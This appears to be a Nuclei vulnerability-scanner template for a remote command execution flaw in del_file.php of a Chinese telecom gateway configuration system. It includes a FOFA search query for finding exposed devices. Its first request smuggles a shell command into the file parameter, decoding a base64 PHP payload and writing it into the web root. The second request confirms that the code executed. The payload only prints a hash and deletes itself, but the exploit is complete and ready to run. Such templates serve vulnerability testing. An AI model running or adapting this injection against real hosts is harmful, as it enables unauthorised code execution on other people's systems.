id: dx-gateway-config-manage-del_file-rce

info:
  name: 电信网关配置管理系统 del_file.php存在命令执行
  author: onewin
  severity: critical
  description: 电信网关配置管理系统 del_file.php存在命令执行
  metadata:
    fofa-query: body="a:link{text-decoration:none;color:orange;}"
  tags: dx,rce
variables:
  filename: '{{rand_base(6)}}'


http:
- raw:
  - |+
    @timeout: 30s
    GET /manager/newtpl/del_file.php?file=1.txt%7Cecho%20PD9waHAgZWNobyBtZDUoJzEyMzQ1NicpO3VubGluayhfX0ZJTEVfXyk7Pz4%3D%20%7C%20base64%20-d%20%3E%20{{filename}}.php HTTP/1.1
    Host: {{Hostname}}

  - |+
    @timeout: 30s
    GET /manager/newtpl/{{filename}}.php HTTP/1.1
    Host: {{Hostname}}

  max-redirects: 3
  matchers-condition: and
  matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'status_code_2 == 200'
          - 'contains(body_2, "e10adc3949ba59abbe56e057f20f883e")'  
        condition: and

